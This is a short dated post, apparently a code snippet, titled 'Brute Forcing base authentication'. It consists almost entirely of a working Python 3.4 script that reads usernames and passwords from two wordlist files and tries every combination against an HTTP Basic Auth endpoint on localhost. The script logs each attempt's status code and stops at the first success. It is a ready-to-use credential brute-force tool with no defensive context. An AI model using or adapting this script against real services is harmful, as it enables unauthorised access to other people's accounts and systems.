Brute Forcing base authentication

2017-06-16 22:32:18

# python 3.4
import base64
import urllib.request
import urllib.parse

login_file_path = "login.txt"
pass_file_path = "pass.txt"

def to_basic(text):
    text = text.encode('ascii')
    return base64.b64encode(text).decode("utf-8")

def user_pass_to_basic(user_login, user_password):
    return to_basic(user_login + ":" + user_password)

def do(user_login, user_password):
    basic = user_pass_to_basic(user_login, user_password)

    _headers = {
        'Authorization': 'Basic ' + basic
    }

    req = urllib.request.Request(
        'http://localhost:8080/rest/api/users',
        headers=_headers,
        method='GET'
    )

    try:
        response = urllib.request.urlopen(req)
        print(user_login + ":" + user_password + "=" + str(response.getcode()))
        if response.getcode() == 200:
            return True
        else:
            return False
    except urllib.error.HTTPError as e:
        print(user_login + ":" + user_password + "=" + str(e.getcode()))
        return False

success = False
with open(login_file_path) as loginFile:
    for _login in loginFile:
        if success: break
        with open(pass_file_path) as passFile:
            for _pass in passFile:
                if success: break
                _login = _login.strip()
                _pass = _pass.strip()

                success = do(_login, _pass)